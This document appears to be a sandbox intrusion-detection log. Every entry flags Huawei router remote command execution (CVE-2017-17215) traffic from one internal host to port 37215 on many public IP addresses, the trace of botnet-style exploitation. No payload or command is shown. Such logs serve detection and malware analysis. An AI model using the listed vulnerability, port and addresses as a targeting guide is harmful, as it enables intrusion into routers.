                                                    07/10/24-08:26:28.911510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4708837215192.168.2.14136.159.238.244
                                                    07/10/24-08:26:38.590532TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854437215192.168.2.14197.12.123.74
                                                    07/10/24-08:27:22.783603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4027837215192.168.2.14148.196.251.20
                                                    07/10/24-08:27:14.829159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482837215192.168.2.14197.53.10.149
                                                    07/10/24-08:26:28.782504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4224237215192.168.2.14157.252.63.15
                                                    07/10/24-08:27:10.621432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5871837215192.168.2.14157.132.240.88
                                                    07/10/24-08:27:33.752992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4114837215192.168.2.14190.179.118.87
                                                    07/10/24-08:27:33.946860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5825037215192.168.2.14157.141.195.215
                                                    07/10/24-08:27:23.782637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894837215192.168.2.14157.203.204.48
                                                    07/10/24-08:27:10.739148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099037215192.168.2.14180.6.44.180
                                                    07/10/24-08:26:18.020440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4238237215192.168.2.14197.107.20.213
                                                    07/10/24-08:26:34.244290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942037215192.168.2.1441.7.75.163
                                                    07/10/24-08:26:43.702243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948237215192.168.2.1466.136.56.210
                                                    07/10/24-08:26:57.625534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4180437215192.168.2.14197.139.156.45
                                                    07/10/24-08:27:13.867398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512837215192.168.2.1441.133.35.248
                                                    07/10/24-08:26:47.998541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4190637215192.168.2.14197.193.13.110
                                                    07/10/24-08:26:47.860758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482237215192.168.2.14197.130.59.13
                                                    07/10/24-08:26:15.800070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5527237215192.168.2.14197.13.170.178
                                                    07/10/24-08:26:29.861984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3309637215192.168.2.1436.78.79.20
                                                    07/10/24-08:26:17.969551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174037215192.168.2.14197.98.163.179
                                                    07/10/24-08:27:32.622738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564037215192.168.2.14157.89.44.192
                                                    07/10/24-08:26:33.257964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380437215192.168.2.14197.13.33.252
                                                    07/10/24-08:27:08.403576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5147437215192.168.2.14197.2.61.117
                                                    07/10/24-08:26:49.774026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636637215192.168.2.1468.86.133.143
                                                    07/10/24-08:26:55.373559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3459037215192.168.2.14157.4.232.55
                                                    07/10/24-08:26:45.633105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297237215192.168.2.14197.120.221.78
                                                    07/10/24-08:26:28.873311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068637215192.168.2.14157.18.242.31
                                                    07/10/24-08:27:08.307803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5519637215192.168.2.1441.90.67.247
                                                    07/10/24-08:26:25.420167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3397037215192.168.2.14197.243.118.53
                                                    07/10/24-08:27:16.994273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483837215192.168.2.1441.145.128.91
                                                    07/10/24-08:27:19.343044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5358437215192.168.2.1441.71.61.223
                                                    07/10/24-08:26:41.558388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4956437215192.168.2.1441.92.38.207
                                                    07/10/24-08:26:14.804640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4320437215192.168.2.1441.32.202.23
                                                    07/10/24-08:26:36.362536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5792437215192.168.2.14157.222.79.123
                                                    07/10/24-08:26:52.070020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3593037215192.168.2.1441.3.144.152
                                                    07/10/24-08:26:26.602369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5049237215192.168.2.1441.138.133.135
                                                    07/10/24-08:26:29.868554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3648237215192.168.2.14157.60.192.39
                                                    07/10/24-08:26:59.654831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5006837215192.168.2.14157.57.220.220
                                                    07/10/24-08:26:33.193965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4703837215192.168.2.14157.61.60.241
                                                    07/10/24-08:27:11.519267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663437215192.168.2.14157.49.43.155
                                                    07/10/24-08:26:33.217883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894437215192.168.2.1451.31.124.134
                                                    07/10/24-08:27:30.436856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701237215192.168.2.1441.242.176.95
                                                    07/10/24-08:26:14.809992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5836637215192.168.2.14197.204.163.3
                                                    07/10/24-08:26:28.633014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4931637215192.168.2.14197.160.66.4
                                                    07/10/24-08:26:28.633742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489037215192.168.2.1441.195.4.75
                                                    07/10/24-08:26:55.366758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5512037215192.168.2.14157.107.226.4
                                                    07/10/24-08:27:14.889916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697237215192.168.2.14197.162.178.220
                                                    07/10/24-08:26:52.090414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631837215192.168.2.14197.217.153.243
                                                    07/10/24-08:27:02.833668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867637215192.168.2.14157.59.166.85
                                                    07/10/24-08:26:20.172014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3632437215192.168.2.1458.26.244.147
                                                    07/10/24-08:26:13.795210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3542637215192.168.2.1441.218.142.246
                                                    07/10/24-08:27:02.908233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5213037215192.168.2.1441.250.2.177
                                                    07/10/24-08:26:38.558999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844037215192.168.2.1450.157.226.199
                                                    07/10/24-08:27:27.169411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5960437215192.168.2.14157.95.89.24
                                                    07/10/24-08:26:28.926609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5586237215192.168.2.14197.102.128.119
                                                    07/10/24-08:26:38.634694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697437215192.168.2.1441.213.6.174
                                                    07/10/24-08:27:05.189042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164437215192.168.2.1441.98.201.188
                                                    07/10/24-08:27:11.529436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4633237215192.168.2.1432.75.247.250
                                                    07/10/24-08:26:36.358429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076037215192.168.2.14212.96.171.167
                                                    07/10/24-08:27:27.142531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565837215192.168.2.14157.195.96.225
                                                    07/10/24-08:27:32.606203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394437215192.168.2.1441.151.167.98
                                                    07/10/24-08:26:26.483995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447837215192.168.2.14157.223.119.71
                                                    07/10/24-08:26:28.774897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4863837215192.168.2.14157.33.111.95
                                                    07/10/24-08:26:53.197285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046037215192.168.2.14105.178.242.107
                                                    07/10/24-08:26:59.642671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681437215192.168.2.1441.197.58.102
                                                    07/10/24-08:27:13.970962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4498237215192.168.2.14157.186.120.6
                                                    07/10/24-08:27:22.527598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079437215192.168.2.1494.37.51.121
                                                    07/10/24-08:27:19.164570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895637215192.168.2.14157.62.69.50
                                                    07/10/24-08:26:29.784523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714237215192.168.2.14197.148.123.50
                                                    07/10/24-08:27:14.839655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291637215192.168.2.1441.17.202.139
                                                    07/10/24-08:26:57.645172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4209637215192.168.2.14157.54.77.35
                                                    07/10/24-08:26:29.861363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3307237215192.168.2.1441.64.140.180
                                                    07/10/24-08:26:59.580181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468837215192.168.2.14177.249.157.0
                                                    07/10/24-08:27:28.181617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3963237215192.168.2.14157.92.233.95
                                                    07/10/24-08:27:22.469991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5135037215192.168.2.14157.131.160.125
                                                    07/10/24-08:27:02.976609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4667437215192.168.2.1441.61.190.200
                                                    07/10/24-08:27:03.007321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617237215192.168.2.14125.47.252.13
                                                    07/10/24-08:27:31.553494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5459837215192.168.2.14197.191.144.137
                                                    07/10/24-08:26:33.151266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4429037215192.168.2.14197.55.132.80
                                                    07/10/24-08:26:47.869388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487637215192.168.2.1441.168.211.12
                                                    07/10/24-08:27:11.545525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5930037215192.168.2.14133.65.168.157
                                                    07/10/24-08:26:31.091003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3365237215192.168.2.1462.164.31.153
                                                    07/10/24-08:26:38.512743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3491837215192.168.2.1487.45.41.47
                                                    07/10/24-08:27:08.432094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3283037215192.168.2.1417.118.48.120
                                                    07/10/24-08:26:36.373846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4126637215192.168.2.14157.97.126.174
                                                    07/10/24-08:26:53.182396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424837215192.168.2.14197.32.144.142
                                                    07/10/24-08:26:31.067325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3508437215192.168.2.1441.53.64.84
                                                    07/10/24-08:27:17.020582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4965437215192.168.2.14197.71.138.194
                                                    07/10/24-08:27:30.534474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426437215192.168.2.1459.95.18.251
                                                    07/10/24-08:27:11.551346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4066637215192.168.2.1441.41.213.231
                                                    07/10/24-08:26:31.076379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4433437215192.168.2.1441.245.128.217
                                                    07/10/24-08:26:59.877508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5500437215192.168.2.14114.2.2.211
                                                    07/10/24-08:26:43.825579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3463437215192.168.2.14197.96.118.31
                                                    07/10/24-08:27:17.011385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994437215192.168.2.14197.192.135.198
                                                    07/10/24-08:27:07.397076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4508437215192.168.2.14197.14.56.19
                                                    07/10/24-08:26:29.822665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5185437215192.168.2.14104.93.79.66
                                                    07/10/24-08:27:17.035861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5183637215192.168.2.1490.88.77.12
                                                    07/10/24-08:27:07.249452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6005237215192.168.2.1441.62.42.58
                                                    07/10/24-08:27:22.926272TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.1480.49.73.249
                                                    07/10/24-08:26:47.868909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110037215192.168.2.14157.147.183.62
                                                    07/10/24-08:27:23.956633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5364637215192.168.2.14197.138.254.124
                                                    07/10/24-08:27:32.546136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3688037215192.168.2.1441.248.188.218
                                                    07/10/24-08:27:22.765869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769837215192.168.2.1453.12.74.190
                                                    07/10/24-08:26:47.988456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4853837215192.168.2.1441.61.130.45
                                                    07/10/24-08:27:33.764696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5163637215192.168.2.14157.66.215.119
                                                    07/10/24-08:27:13.886782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641037215192.168.2.14157.235.223.87
                                                    07/10/24-08:27:13.889582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5878437215192.168.2.14157.217.39.25
                                                    07/10/24-08:27:13.728066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334637215192.168.2.14157.47.122.135
                                                    07/10/24-08:27:17.109836TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414637215192.168.2.14157.249.138.25
                                                    07/10/24-08:27:13.996261TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863237215192.168.2.14157.252.22.191
                                                    07/10/24-08:26:47.953100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488437215192.168.2.14157.5.212.175
                                                    07/10/24-08:26:25.449371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3387637215192.168.2.14124.125.210.163
                                                    07/10/24-08:27:30.511682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287237215192.168.2.14157.209.160.198
                                                    07/10/24-08:26:52.068814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946437215192.168.2.14157.41.41.92
                                                    07/10/24-08:26:14.811760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960837215192.168.2.14197.214.243.205
                                                    07/10/24-08:26:33.225054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654637215192.168.2.1440.103.250.95
                                                    07/10/24-08:27:10.751291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4032037215192.168.2.14197.159.86.226
                                                    07/10/24-08:27:23.925021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5124237215192.168.2.1441.239.249.249
                                                    07/10/24-08:26:13.778928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695437215192.168.2.14157.199.168.111
                                                    07/10/24-08:27:19.157761TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901637215192.168.2.1473.1.39.83
                                                    07/10/24-08:26:36.342086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682837215192.168.2.14195.99.231.152
                                                    07/10/24-08:27:08.373908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3539837215192.168.2.14197.164.33.110
                                                    07/10/24-08:27:13.850530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4569237215192.168.2.14157.96.73.178
                                                    07/10/24-08:27:24.913087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3993237215192.168.2.14217.164.211.77
                                                    07/10/24-08:26:28.682326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112637215192.168.2.14197.219.37.186
                                                    07/10/24-08:26:57.662909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214837215192.168.2.14157.151.86.71
                                                    07/10/24-08:27:30.416774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4082437215192.168.2.1441.37.83.78
                                                    07/10/24-08:26:36.399682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830837215192.168.2.1479.18.254.125
                                                    07/10/24-08:27:14.847591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749037215192.168.2.14157.178.199.196
                                                    07/10/24-08:27:07.270809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5371037215192.168.2.14197.197.237.179
                                                    07/10/24-08:26:11.129630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507837215192.168.2.14131.142.45.223
                                                    07/10/24-08:27:05.158700TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3596237215192.168.2.1489.0.108.43
                                                    07/10/24-08:26:25.432344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4689837215192.168.2.14157.206.125.190
                                                    07/10/24-08:27:11.529437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4575237215192.168.2.1441.79.255.134
                                                    07/10/24-08:26:47.864255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966237215192.168.2.1441.157.139.163
                                                    07/10/24-08:26:11.562068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511837215192.168.2.14123.39.28.49
                                                    07/10/24-08:26:41.461581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4285637215192.168.2.14197.153.138.28
                                                    07/10/24-08:27:33.857818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773637215192.168.2.14197.209.98.246
                                                    07/10/24-08:26:42.126457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317437215192.168.2.14197.72.43.65
                                                    07/10/24-08:27:24.903718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542837215192.168.2.14157.68.14.253
                                                    07/10/24-08:26:57.596939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290837215192.168.2.1441.118.0.46
                                                    07/10/24-08:26:15.811251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4199237215192.168.2.1441.129.105.53
                                                    07/10/24-08:27:30.508091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807637215192.168.2.14197.46.227.81
                                                    07/10/24-08:27:10.751159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4123637215192.168.2.14157.15.224.164
                                                    07/10/24-08:27:27.160309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4141637215192.168.2.14123.65.189.169
                                                    07/10/24-08:26:41.395852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407637215192.168.2.1441.91.89.159
                                                    07/10/24-08:27:10.739921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4731437215192.168.2.14197.73.84.67
                                                    07/10/24-08:27:17.068125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5936437215192.168.2.14157.234.26.79
                                                    07/10/24-08:26:22.265342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3686437215192.168.2.1441.192.234.211
                                                    07/10/24-08:27:10.751291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566437215192.168.2.14157.186.154.36
                                                    07/10/24-08:27:07.343268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574437215192.168.2.1419.188.39.111
                                                    07/10/24-08:26:59.643122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484637215192.168.2.14157.238.160.83
                                                    07/10/24-08:27:07.352797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524437215192.168.2.1441.142.9.119
                                                    07/10/24-08:27:02.807421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724837215192.168.2.14157.233.188.56
                                                    07/10/24-08:26:29.835368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5715237215192.168.2.14157.170.134.60
                                                    07/10/24-08:27:07.356650TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639237215192.168.2.14171.247.247.189
                                                    07/10/24-08:26:29.755457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4785037215192.168.2.14216.234.20.111
                                                    07/10/24-08:27:32.523426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284437215192.168.2.14157.217.43.124
                                                    07/10/24-08:27:33.778513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204837215192.168.2.1459.201.147.247
                                                    07/10/24-08:26:28.860348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314037215192.168.2.1441.195.234.105
                                                    07/10/24-08:27:27.165104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5975837215192.168.2.1441.158.182.152
                                                    07/10/24-08:27:23.953433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574637215192.168.2.14197.247.251.70
                                                    07/10/24-08:27:02.853757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3470437215192.168.2.14122.41.169.54
                                                    07/10/24-08:27:20.437179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886837215192.168.2.1473.221.48.140
                                                    07/10/24-08:27:34.127270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869837215192.168.2.14157.169.249.25
                                                    07/10/24-08:26:33.237467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192637215192.168.2.14151.114.138.174
                                                    07/10/24-08:26:22.259502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524437215192.168.2.1441.120.159.171
                                                    07/10/24-08:27:02.812421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947037215192.168.2.14157.39.244.130
                                                    07/10/24-08:26:55.385824TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022637215192.168.2.1441.86.248.87
                                                    07/10/24-08:26:18.037759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4836837215192.168.2.14163.97.78.197
                                                    07/10/24-08:27:22.917695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015237215192.168.2.1454.42.69.238
                                                    07/10/24-08:27:03.015604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4767437215192.168.2.1481.205.196.26
                                                    07/10/24-08:27:07.368181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5481237215192.168.2.14197.200.180.237
                                                    07/10/24-08:27:33.980706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3805237215192.168.2.1437.152.6.232
                                                    07/10/24-08:26:42.412174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3874437215192.168.2.14197.173.230.210
                                                    07/10/24-08:27:20.483733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595437215192.168.2.14197.92.171.0
                                                    07/10/24-08:27:22.877679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749237215192.168.2.14157.82.79.230
                                                    07/10/24-08:26:47.951146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3903437215192.168.2.14130.193.168.8
                                                    07/10/24-08:26:59.848554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5708837215192.168.2.14219.162.170.141
                                                    07/10/24-08:27:33.908493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4298637215192.168.2.14103.138.227.165
                                                    07/10/24-08:27:11.513310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575037215192.168.2.1441.95.77.215
                                                    07/10/24-08:27:11.520220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4515837215192.168.2.14197.68.15.63
                                                    07/10/24-08:27:32.549149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424837215192.168.2.14157.203.107.84
                                                    07/10/24-08:26:43.530695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5522837215192.168.2.14157.74.211.191
                                                    07/10/24-08:27:32.595539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4493237215192.168.2.1441.96.183.187
